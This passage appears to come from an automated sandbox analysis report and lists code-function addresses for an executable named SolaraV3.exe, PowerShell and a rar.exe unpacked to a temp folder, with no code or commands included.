Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC711B50	2_2_00007FF6DC711B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC715D30	2_2_00007FF6DC715D30
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70A47B	2_2_00007FF6DC70A47B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC70ACAD	2_2_00007FF6DC70ACAD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0BB66EE0	2_2_00007FFB0BB66EE0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811EA6	2_2_00007FFB0B811EA6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815934	2_2_00007FFB0B815934
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814A59	2_2_00007FFB0B814A59
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813B98	2_2_00007FFB0B813B98
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812D79	2_2_00007FFB0B812D79
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815D8A	2_2_00007FFB0B815D8A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81516E	2_2_00007FFB0B81516E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B948960	2_2_00007FFB0B948960
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816CBC	2_2_00007FFB0B816CBC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816A87	2_2_00007FFB0B816A87
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811F9B	2_2_00007FFB0B811F9B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813FDF	2_2_00007FFB0B813FDF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81655F	2_2_00007FFB0B81655F
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8121BC	2_2_00007FFB0B8121BC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0BA50E00	2_2_00007FFB0BA50E00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8160A0	2_2_00007FFB0B8160A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8122ED	2_2_00007FFB0B8122ED
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811140	2_2_00007FFB0B811140
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816F28	2_2_00007FFB0B816F28
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81704A	2_2_00007FFB0B81704A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8C0440	2_2_00007FFB0B8C0440
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82C480	2_2_00007FFB0B82C480
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8172C5	2_2_00007FFB0B8172C5
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815B14	2_2_00007FFB0B815B14
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812C7A	2_2_00007FFB0B812C7A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B4170	2_2_00007FFB0B9B4170
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814106	2_2_00007FFB0B814106
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815B78	2_2_00007FFB0B815B78
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816C21	2_2_00007FFB0B816C21
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814B5B	2_2_00007FFB0B814B5B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8129D2	2_2_00007FFB0B8129D2
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82C620	2_2_00007FFB0B82C620
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81177B	2_2_00007FFB0B81177B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B94C660	2_2_00007FFB0B94C660
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812144	2_2_00007FFB0B812144
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814638	2_2_00007FFB0B814638
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8125F4	2_2_00007FFB0B8125F4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8169E7	2_2_00007FFB0B8169E7
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B93DC50	2_2_00007FFB0B93DC50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813602	2_2_00007FFB0B813602
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811D02	2_2_00007FFB0B811D02
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C99D0	2_2_00007FFB0B9C99D0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813A8A	2_2_00007FFB0B813A8A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8159FC	2_2_00007FFB0B8159FC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814C19	2_2_00007FFB0B814C19
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812FD1	2_2_00007FFB0B812FD1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8111CC	2_2_00007FFB0B8111CC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812761	2_2_00007FFB0B812761
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8122B1	2_2_00007FFB0B8122B1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8172AC	2_2_00007FFB0B8172AC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811622	2_2_00007FFB0B811622
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81736A	2_2_00007FFB0B81736A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811D88	2_2_00007FFB0B811D88
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B941490	2_2_00007FFB0B941490
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8132EC	2_2_00007FFB0B8132EC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81228E	2_2_00007FFB0B81228E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815515	2_2_00007FFB0B815515
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81428C	2_2_00007FFB0B81428C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82D260	2_2_00007FFB0B82D260
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8130C6	2_2_00007FFB0B8130C6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815BF5	2_2_00007FFB0B815BF5
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B835200	2_2_00007FFB0B835200
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B949130	2_2_00007FFB0B949130
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B50B0	2_2_00007FFB0B9B50B0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C9100	2_2_00007FFB0B9C9100
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81710D	2_2_00007FFB0B81710D
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811424	2_2_00007FFB0B811424
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8154D4	2_2_00007FFB0B8154D4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B951760	2_2_00007FFB0B951760
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814C3C	2_2_00007FFB0B814C3C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812E91	2_2_00007FFB0B812E91
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814ACA	2_2_00007FFB0B814ACA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81504C	2_2_00007FFB0B81504C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81276B	2_2_00007FFB0B81276B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815614	2_2_00007FFB0B815614
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811B27	2_2_00007FFB0B811B27
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8115C8	2_2_00007FFB0B8115C8
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8154CF	2_2_00007FFB0B8154CF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B952C00	2_2_00007FFB0B952C00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813A94	2_2_00007FFB0B813A94
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814D09	2_2_00007FFB0B814D09
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815F10	2_2_00007FFB0B815F10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8123F6	2_2_00007FFB0B8123F6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815DA3	2_2_00007FFB0B815DA3
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9CA900	2_2_00007FFB0B9CA900
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8153AD	2_2_00007FFB0B8153AD
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8144CB	2_2_00007FFB0B8144CB
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82F060	2_2_00007FFB0B82F060
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81638E	2_2_00007FFB0B81638E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9B3010	2_2_00007FFB0B9B3010
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814F43	2_2_00007FFB0B814F43
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812171	2_2_00007FFB0B812171
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8153C6	2_2_00007FFB0B8153C6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82EF00	2_2_00007FFB0B82EF00
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81213A	2_2_00007FFB0B81213A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8F2CD0	2_2_00007FFB0B8F2CD0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816564	2_2_00007FFB0B816564
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811299	2_2_00007FFB0B811299
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815434	2_2_00007FFB0B815434
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813634	2_2_00007FFB0B813634
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816EBF	2_2_00007FFB0B816EBF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811A50	2_2_00007FFB0B811A50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811217	2_2_00007FFB0B811217
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812301	2_2_00007FFB0B812301
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816D5C	2_2_00007FFB0B816D5C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8126EE	2_2_00007FFB0B8126EE
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9C6100	2_2_00007FFB0B9C6100
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814E53	2_2_00007FFB0B814E53
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8168CA	2_2_00007FFB0B8168CA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9525D0	2_2_00007FFB0B9525D0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81144C	2_2_00007FFB0B81144C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B93E5F0	2_2_00007FFB0B93E5F0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8165A0	2_2_00007FFB0B8165A0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B814408	2_2_00007FFB0B814408
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81318E	2_2_00007FFB0B81318E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816FFF	2_2_00007FFB0B816FFF
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8110AA	2_2_00007FFB0B8110AA
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81707C	2_2_00007FFB0B81707C
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81416A	2_2_00007FFB0B81416A
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813698	2_2_00007FFB0B813698
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81348B	2_2_00007FFB0B81348B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82BF20	2_2_00007FFB0B82BF20
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8160DC	2_2_00007FFB0B8160DC
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815E25	2_2_00007FFB0B815E25
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82BD60	2_2_00007FFB0B82BD60
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B943CC0	2_2_00007FFB0B943CC0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B815A65	2_2_00007FFB0B815A65
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811CC6	2_2_00007FFB0B811CC6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B947480	2_2_00007FFB0B947480
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812D10	2_2_00007FFB0B812D10
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813BA7	2_2_00007FFB0B813BA7
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812671	2_2_00007FFB0B812671
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B812987	2_2_00007FFB0B812987
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B817257	2_2_00007FFB0B817257
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813837	2_2_00007FFB0B813837
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B816EF1	2_2_00007FFB0B816EF1
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B83B1C0	2_2_00007FFB0B83B1C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B82F200	2_2_00007FFB0B82F200
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8150B0	2_2_00007FFB0B8150B0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81114F	2_2_00007FFB0B81114F
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B9CB0E0	2_2_00007FFB0B9CB0E0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B8157D6	2_2_00007FFB0B8157D6
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B947780	2_2_00007FFB0B947780
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81435E	2_2_00007FFB0B81435E
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B87F700	2_2_00007FFB0B87F700
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B813792	2_2_00007FFB0B813792
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81474B	2_2_00007FFB0B81474B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B811B36	2_2_00007FFB0B811B36
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B83B550	2_2_00007FFB0B83B550
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35B360	2_2_00007FFB0C35B360
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35168B	2_2_00007FFB0C35168B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3520B3	2_2_00007FFB0C3520B3
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3B0B50	2_2_00007FFB0C3B0B50
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C356BA0	2_2_00007FFB0C356BA0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C351537	2_2_00007FFB0C351537
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C351DD4	2_2_00007FFB0C351DD4
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C35195B	2_2_00007FFB0C35195B
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3A0240	2_2_00007FFB0C3A0240
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C3B8460	2_2_00007FFB0C3B8460
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0C352572	2_2_00007FFB0C352572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAA9470FDD	14_2_00007FFAA9470FDD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9AE10	110_2_00007FF74EE9AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7ABA0	110_2_00007FF74EE7ABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA7B24	110_2_00007FF74EEA7B24
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE80A2C	110_2_00007FF74EE80A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE71884	110_2_00007FF74EE71884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7B540	110_2_00007FF74EE7B540
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE854C0	110_2_00007FF74EE854C0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE81180	110_2_00007FF74EE81180
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE782F0	110_2_00007FF74EE782F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAC00C	110_2_00007FF74EEAC00C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB4FE8	110_2_00007FF74EEB4FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDDFD8	110_2_00007FF74EEDDFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDAF90	110_2_00007FF74EEDAF90
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA5F4C	110_2_00007FF74EEA5F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE90104	110_2_00007FF74EE90104
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED00F0	110_2_00007FF74EED00F0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0074	110_2_00007FF74EEA0074
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9C05C	110_2_00007FF74EE9C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA8040	110_2_00007FF74EEA8040
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE83030	110_2_00007FF74EE83030
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7EE08	110_2_00007FF74EE7EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE81E04	110_2_00007FF74EE81E04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC1DCC	110_2_00007FF74EEC1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB9D74	110_2_00007FF74EEB9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0D20	110_2_00007FF74EEA0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAAF0C	110_2_00007FF74EEAAF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE79EFC	110_2_00007FF74EE79EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBEEA4	110_2_00007FF74EEBEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7CE84	110_2_00007FF74EE7CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EECFE74	110_2_00007FF74EECFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88E68	110_2_00007FF74EE88E68
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEBAE50	110_2_00007FF74EEBAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC9B98	110_2_00007FF74EEC9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB4B38	110_2_00007FF74EEB4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE99D0C	110_2_00007FF74EE99D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC6D0C	110_2_00007FF74EEC6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7DD04	110_2_00007FF74EE7DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5C8C	110_2_00007FF74EEB5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88C30	110_2_00007FF74EE88C30
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB69FD	110_2_00007FF74EEB69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE749B8	110_2_00007FF74EE749B8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9D97C	110_2_00007FF74EE9D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAD91C	110_2_00007FF74EEAD91C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE7CB14	110_2_00007FF74EE7CB14
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEDAAC0	110_2_00007FF74EEDAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB5A70	110_2_00007FF74EEB5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAFA6C	110_2_00007FF74EEAFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE967E0	110_2_00007FF74EE967E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE817C8	110_2_00007FF74EE817C8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB190C	110_2_00007FF74EEB190C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA0904	110_2_00007FF74EEA0904
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA38E8	110_2_00007FF74EEA38E8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC18A8	110_2_00007FF74EEC18A8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE82890	110_2_00007FF74EE82890
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE78884	110_2_00007FF74EE78884
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC260C	110_2_00007FF74EEC260C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEA65FC	110_2_00007FF74EEA65FC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE9F5B0	110_2_00007FF74EE9F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE88598	110_2_00007FF74EE88598
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAF59C	110_2_00007FF74EEAF59C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEAA710	110_2_00007FF74EEAA710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB0710	110_2_00007FF74EEB0710
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEB2700	110_2_00007FF74EEB2700
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED86D4	110_2_00007FF74EED86D4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE886C4	110_2_00007FF74EE886C4
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EEC7660	110_2_00007FF74EEC7660
